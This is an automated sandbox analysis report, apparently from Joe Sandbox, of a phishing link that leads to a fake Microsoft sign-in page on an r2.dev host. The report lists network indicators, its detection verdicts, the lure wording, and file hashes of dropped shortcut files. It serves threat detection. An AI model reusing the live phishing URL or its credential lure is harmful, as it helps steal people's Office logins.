        162.159.140.237
        truetrue
          unknown
          k8s-ingressn-ingressn-cff9273990-6551cbab7adf8844.elb.eu-central-1.amazonaws.com
          3.124.33.45
          truefalse
            unknown
            o365.alnassers.net
            147.79.74.176
            truefalse
              high
              code.jquery.com
              151.101.66.137
              truefalse
                high
                cdnjs.cloudflare.com
                104.17.24.14
                truefalse
                  high
                  mira-ooc.tm-4.office.com
                  52.97.188.66
                  truefalse
                    unknown
                    www.google.com
                    142.250.186.164
                    truefalse
                      high
                      api.ipify.org
                      104.26.13.205
                      truefalse
                        high
                        sni1gl.wpc.sigmacdn.net
                        152.199.21.175
                        truefalse
                          high
                          mira-ofc.tm-4.office.com
                          52.110.17.10
                          truefalse
                            unknown
                            r4.res.office365.com
                            unknown
                            unknownfalse
                              high
                              myarrowleaf1-my.sharepoint.com
                              unknown
                              unknownfalse
                                unknown
                                southcentralus0-0.pushnp.svc.ms
                                unknown
                                unknownfalse
                                  unknown
                                  westus31-mediap.svc.ms
                                  unknown
                                  unknownfalse
                                    high
                                    m365cdn.nel.measure.office.net
                                    unknown
                                    unknownfalse
                                      high
                                      b3417200d409a61b8406c7116155662f.fp.measure.office.com
                                      unknown
                                      unknownfalse
                                        unknown
                                        tr-ooc-atm.office.com
                                        unknown
                                        unknownfalse
                                          high
                                          spo.nel.measure.office.net
                                          unknown
                                          unknownfalse
                                            high
                                            tr-ofc-mira.office.com
                                            unknown
                                            unknownfalse
                                              high
                                              upload.fp.measure.office.com
                                              unknown
                                              unknownfalse
                                                high
                                                config.fp.measure.office.com
                                                unknown
                                                unknownfalse
                                                  high
                                                  linklock.titanhq.com
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    NameMaliciousAntivirus DetectionReputation
                                                    https://pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev/0nedrivefaoffice36500O.htmltrue
                                                      unknown
                                                      https://myarrowleaf1-my.sharepoint.com/personal/marge_penrod_myarrowleaf_org/_layouts/15/onedrive.aspx?id=%2Fpersonal%2Fmarge%5Fpenrod%5Fmyarrowleaf%5Forg%2FDocuments%2FNorthwest%20Glass%20Manufacturing&ga=1false
                                                        unknown
                                                        https://myarrowleaf1-my.sharepoint.com/personal/marge_penrod_myarrowleaf_org/_layouts/15/onedrive.aspx?ga=1&id=%2Fpersonal%2Fmarge%5Fpenrod%5Fmyarrowleaf%5Forg%2FDocuments%2FNorthwest%20Glass%20Manufacturing%2FNorthwest%20Glass%20Manufacturing%20Docxx%2Epdf&parent=%2Fpersonal%2Fmarge%5Fpenrod%5Fmyarrowleaf%5Forg%2FDocuments%2FNorthwest%20Glass%20Manufacturingfalse
                                                          unknown
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          13.107.136.10
                                                          dual-spo-0005.spo-msedge.netUnited States
                                                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          162.159.140.237
                                                          pub-3e795e3d64dd4786b9cd98fa10cef215.r2.devUnited States
                                                          13335CLOUDFLARENETUStrue
                                                          20.189.173.7
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          173.194.76.84
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          147.79.74.176
                                                          o365.alnassers.netUnited States
                                                          208485EKSENBILISIMTRfalse
                                                          2.19.126.200
                                                          unknownEuropean Union
                                                          16625AKAMAI-ASUSfalse
                                                          2.19.126.143
                                                          unknownEuropean Union
                                                          16625AKAMAI-ASUSfalse
                                                          142.250.185.163
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          52.110.17.2
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          52.168.112.66
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          151.101.66.137
                                                          code.jquery.comUnited States
                                                          54113FASTLYUSfalse
                                                          64.23.155.205
                                                          vangabouned.topUnited States
                                                          3064AFFINITY-FTLUSfalse
                                                          104.102.55.235
                                                          unknownUnited States
                                                          16625AKAMAI-ASUSfalse
                                                          142.250.184.227
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          216.58.212.174
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          104.26.13.205
                                                          api.ipify.orgUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          23.38.98.96
                                                          unknownUnited States
                                                          16625AKAMAI-ASUSfalse
                                                          2.23.209.24
                                                          unknownEuropean Union
                                                          1273CWVodafoneGroupPLCEUfalse
                                                          2.23.209.46
                                                          unknownEuropean Union
                                                          1273CWVodafoneGroupPLCEUfalse
                                                          104.17.24.14
                                                          cdnjs.cloudflare.comUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          1.1.1.1
                                                          unknownAustralia
                                                          13335CLOUDFLARENETUSfalse
                                                          2.23.209.42
                                                          unknownEuropean Union
                                                          1273CWVodafoneGroupPLCEUfalse
                                                          3.124.33.45
                                                          k8s-ingressn-ingressn-cff9273990-6551cbab7adf8844.elb.eu-central-1.amazonaws.comUnited States
                                                          16509AMAZON-02USfalse
                                                          52.111.239.73
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          20.42.65.93
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          52.97.186.18
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          216.58.206.42
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          13.107.6.163
                                                          unknownUnited States
                                                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          142.250.185.238
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          151.101.2.137
                                                          unknownUnited States
                                                          54113FASTLYUSfalse
                                                          52.97.188.66
                                                          mira-ooc.tm-4.office.comUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          239.255.255.250
                                                          unknownReserved
                                                          unknownunknownfalse
                                                          52.110.17.10
                                                          mira-ofc.tm-4.office.comUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          52.107.225.6
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          52.107.243.199
                                                          mira-ssc.tm-4.office.comUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          52.98.253.146
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          142.250.186.164
                                                          www.google.comUnited States
                                                          15169GOOGLEUSfalse
                                                          152.199.21.175
                                                          sni1gl.wpc.sigmacdn.netUnited States
                                                          15133EDGECASTUSfalse
                                                          52.97.232.226
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          52.107.243.193
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          95.101.54.225
                                                          unknownEuropean Union
                                                          34164AKAMAI-LONGBfalse
                                                          95.101.54.226
                                                          unknownEuropean Union
                                                          34164AKAMAI-LONGBfalse
                                                          IP
                                                          192.168.2.16
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1556067
                                                          Start date and time:2024-11-14 21:21:51 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                          Sample URL:https://linklock.titanhq.com/analyse?url=https%3A%2F%2Fmyarrowleaf1-my.sharepoint.com%2F%3Af%3A%2Fg%2Fpersonal%2Fmarge_penrod_myarrowleaf_org%2FElQV40bjfBZKivPSKIPxGuYBa20TAVuQG9ya4YrQRKjHiQ%3Fe%3D7nML8f&data=eJxVzctugzAQBdCvMbtGBqOkWXhBlOYhUiW0VaR0gyZgGyL80Ng05e8L6aaVZlZz7p2Kz5PlPI1BxBQqFtW8qkF14P2ssjrSfEEPxukjHONsHXlusRboSUrN_aG0VA-IPFyxVU0QOB7_dfS8CcF5wjKSbMbRAyDaeydAxk96mPkGUDjbmjDxybBM_mo1rhv_WQPdlARUonTCoK3LPzWlxUm-dMU5pdebXH3m7dfpPd-fvrf9ZQUJ_cjOfbFdDpBesHjLb7u2IGwjCFsvzOvhWf4A0NhYxQ%25%25
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:17
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • EGA enabled
                                                          Analysis Mode:stream
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal56.phis.win@21/176@72/367
                                                          • Exclude process from analysis (whitelisted): svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 142.250.185.163, 216.58.212.174, 173.194.76.84, 34.104.35.123
                                                          • Excluded domains from analysis (whitelisted): clients2.google.com, 193494-ipv4v6c.farm.dprodmgd105.sharepointonline.com.akadns.net, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • VT rate limit hit for: https://linklock.titanhq.com/analyse?url=https%3A%2F%2Fmyarrowleaf1-my.sharepoint.com%2F%3Af%3A%2Fg%2Fpersonal%2Fmarge_penrod_myarrowleaf_org%2FElQV40bjfBZKivPSKIPxGuYBa20TAVuQG9ya4YrQRKjHiQ%3Fe%3D7nML8f&data=eJxVzctugzAQBdCvMbtGBqOkWXhBlOYhUiW0VaR0gyZgGyL80Ng05e8L6aaVZlZz7p2Kz5PlPI1BxBQqFtW8qkF14P2ssjrSfEEPxukjHONsHXlusRboSUrN_aG0VA-IPFyxVU0QOB7_dfS8CcF5wjKSbMbRAyDaeydAxk96mPkGUDjbmjDxybBM_mo1rhv_WQPdlARUonTCoK3LPzWlxUm-dMU5pdebXH3m7dfpPd-fvrf9ZQUJ_cjOfbFdDpBesHjLb7u2IGwjCFsvzOvhWf4A0NhYxQ%25%25
                                                          InputOutput
                                                          URL: https://linklock.titanhq.com Model: Joe Sandbox AI
                                                          {
                                                              "typosquatting": false,
                                                              "unusual_query_string": false,
                                                              "suspicious_tld": false,
                                                              "ip_in_url": false,
                                                              "long_subdomain": false,
                                                              "malicious_keywords": false,
                                                              "encoded_characters": false,
                                                              "redirection": false,
                                                              "contains_email_address": false,
                                                              "known_domain": true,
                                                              "brand_spoofing_attempt": false,
                                                              "third_party_hosting": false
                                                          }
                                                          URL: https://linklock.titanhq.com
                                                          URL: https://myarrowleaf1-my.sharepoint.com Model: Joe Sandbox AI
                                                          {
                                                              "typosquatting": false,
                                                              "unusual_query_string": false,
                                                              "suspicious_tld": false,
                                                              "ip_in_url": false,
                                                              "long_subdomain": false,
                                                              "malicious_keywords": false,
                                                              "encoded_characters": false,
                                                              "redirection": false,
                                                              "contains_email_address": false,
                                                              "known_domain": true,
                                                              "brand_spoofing_attempt": false,
                                                              "third_party_hosting": false
                                                          }
                                                          URL: https://myarrowleaf1-my.sharepoint.com
                                                          URL: https://pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev/0nedrivefaoffice36500O.html Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "contains_trigger_text": true,
                                                            "trigger_text": "Please authenticate with your office credentials to access the document",
                                                            "prominent_button_name": "VIEW DOCUMENT",
                                                            "text_input_field_labels": "unknown",
                                                            "pdf_icon_visible": false,
                                                            "has_visible_captcha": false,
                                                            "has_urgent_text": false,
                                                            "has_visible_qrcode": false
                                                          }
                                                          URL: https://pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev Model: Joe Sandbox AI
                                                          {
                                                              "typosquatting": false,
                                                              "unusual_query_string": false,
                                                              "suspicious_tld": true,
                                                              "ip_in_url": false,
                                                              "long_subdomain": true,
                                                              "malicious_keywords": false,
                                                              "encoded_characters": false,
                                                              "redirection": false,
                                                              "contains_email_address": false,
                                                              "known_domain": false,
                                                              "brand_spoofing_attempt": false,
                                                              "third_party_hosting": true
                                                          }
                                                          URL: https://pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev
                                                          URL: https://pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev/0nedrivefaoffice36500O.html Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "brands": []
                                                          }
                                                          ```
                                                          
                                                          The provided image does not contain any visible brand logos or names. The image appears to be a financial statement or document that requires authentication to view. There are no brand names or logos visible in the header, footer, or body of the document.
                                                          URL: https://pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev/0nedrivefaoffice36500O.html Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "contains_trigger_text": false,
                                                            "trigger_text": "unknown",
                                                            "prominent_button_name": "unknown",
                                                            "text_input_field_labels": "unknown",
                                                            "pdf_icon_visible": false,
                                                            "has_visible_captcha": false,
                                                            "has_urgent_text": false,
                                                            "has_visible_qrcode": false
                                                          }
                                                          URL: https://pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev/0nedrivefaoffice36500O.html Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "brands": []
                                                          }
                                                          URL: https://pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev/0nedrivefaoffice36500O.html Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "contains_trigger_text": true,
                                                            "trigger_text": "Sign in",
                                                            "prominent_button_name": "Next",
                                                            "text_input_field_labels": [
                                                              "Email, phone, or Skype"
                                                            ],
                                                            "pdf_icon_visible": false,
                                                            "has_visible_captcha": false,
                                                            "has_urgent_text": false,
                                                            "has_visible_qrcode": false
                                                          }
                                                          URL: https://pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev/0nedrivefaoffice36500O.html Model: Joe Sandbox AI
                                                          ```json
                                                          {
                                                            "brands": [
                                                              "Microsoft"
                                                            ]
                                                          }
                                                          URL: https://pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev/0nedrivefaoffice36500O.html Model: Joe Sandbox AI
                                                          ```json{  "legit_domain": "microsoft.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft' is a well-known global technology company.",    "The URL 'pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev' does not match the legitimate domain 'microsoft.com'.",    "The domain 'r2.dev' is not associated with Microsoft and appears to be a generic or cloud service domain.",    "The presence of a long alphanumeric string in the subdomain is unusual and can be indicative of phishing.",    "The input fields 'Email, phone, or Skype' are commonly targeted in phishing attempts to harvest personal information."  ],  "riskscore": 9}
                                                          Google indexed: False
                                                          URL: pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev
                                                                      Brands: Microsoft
                                                                      Input Fields: Email, phone, or Skype
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 14 19:22:21 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                          Category:dropped
                                                          Size (bytes):2673
                                                          Entropy (8bit):3.986250190859167
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:121081B05F3232FDCCE67C614B632882
                                                          SHA1:F5541C01E266C515A5982054B5E5A3BDF828CC91
                                                          SHA-256:57B54373F49AEB26BFAF3D1CE0D8D19ED0884A28D29ECE02943BC5C2BC1F566C
                                                          SHA-512:2C955D225BB55EAEA71C0EA903A1F046ED6AD5167043FF0981E66CF20E73242BA3DEC5F2B31C92C6A218CAE298E8A4227420C06651F1E76F8C5D24C3F409FE5C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:L..................F.@.. ...$+.,.........6..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.InY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VnY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VnY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VnY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VnY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........o..z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 14 19:22:21 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                          Category:dropped
                                                          Size (bytes):2675
                                                          Entropy (8bit):4.000769069642355
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:9F6B2E5C834A8592330A81D1B2759094
                                                          SHA1:BD6E8BAF204E5B67C3161F9400D0DC9B67850B52
                                                          SHA-256:BC84602A8A37A222D63A6E1C9758A46331477D1199F53DE831A0C75B422C1DFB
                                                          SHA-512:A3D115F2D260C6939DB692C864DA040D097FD72D26BD528CED371672563CED3CA363978D88AF0BCEFD2EC5713725B73761178F234EA37A48B894112C2D7C5892
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:L..................F.@.. ...$+.,....S...6..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.InY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VnY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VnY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VnY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VnY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........o..z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                          Category:dropped
                                                          Size (bytes):2689
                                                          Entropy (8bit):4.009643277331698
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:821944B15CB6BDF5B952C0557BAC7F74
                                                          SHA1:8A8F5BBE90AFB8F479331CC44ADDA2A93EC0C01F
                                                          SHA-256:85A1E36FAB93380BE03D82E76D161B3CECDF846B641A578E450933000A4E9932
                                                          SHA-512:03D42D4C11205CDEEAF69225617A3174F50D46ECB8B40A1B9A4FDA3BC7472FC78EB28E2CC1DE86D3A13807752DCB260FADD89EF69641873A1E79CAE2A6E6F028
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.InY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VnY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VnY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VnY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........o..z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 14 19:22:20 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                          Category:dropped
                                                          Size (bytes):2677
                                                          Entropy (8bit):4.002943670612164
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:3494F207DDD8F8D2186A95341718AE0F
                                                          SHA1:2D2733B5237001F561317AA27DDE34D003C82203
                                                          SHA-256:3A96CED6E99C3E26C8DF433B2146D79C9AF6857F2D6764FB4F10C96E32FD50DF
                                                          SHA-512:33C7DDE79BEE521CA6476D84220EB6D968753716EB7EBEC1FBECE98FDCB9D6B62BAEA9870E83296AF454462BA41A21C0EF7084A9094053748AAF6E4253BFE6CB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:L..................F.@.. ...$+.,....."...6..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.InY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VnY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VnY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VnY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VnY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........o..z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 14 19:22:21 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                          Category:dropped
                                                          Size (bytes):2677
                                                          Entropy (8bit):3.9908058132755593
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:89FA7B8632F1ADC7A19D4346BA6210C4
                                                          SHA1:E4C2F5771694CD6BC4D22A22922FB75DF3F8E0D7
                                                          SHA-256:FF4AA78146978430EFB13B02AA1DC5638EEF810975935EF578B5DE43A4F0F4A7
                                                          SHA-512:380F511D10DAB7BA351C456C268BF26B98AD31F88066A2417E1751E01894E7D38881E9B46AE5BFDB6C0697FA23DF65EF739F10F7E24836D48F22C4F30F22CF5A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:L..................F.@.. ...$+.,....?....6..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.InY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VnY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VnY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VnY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VnY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........o..z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 14 19:22:20 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                          Category:dropped
                                                          Size (bytes):2679
                                                          Entropy (8bit):3.9956260577097593
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:21508F72954B19ABAC1D9F275340F213
                                                          SHA1:043D0B210D269E3F9332D4FE4D075C64DEE34350
                                                          SHA-256:F7DC7CD34605AB23F65B4C4051868525DF0E70398D501635452DFFC2D7EF8836
                                                          SHA-512:07A407B174646BB2DAE896FB7127520018673C6B007524E575E60088F616A48A0B780EE10067C8EDBBA7EFE1BAEED10847A162C25D6E052089D720E44B6669D5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:L..................F.@.. ...$+.,....pI|..6..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.InY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VnY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VnY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VnY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VnY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........o..z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (48316), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):48316
                                                          Entropy (8bit):5.6346993394709
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:2CA03AD87885AB983541092B87ADB299
                                                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                          Malicious:false
                                                          Reputation:unknown
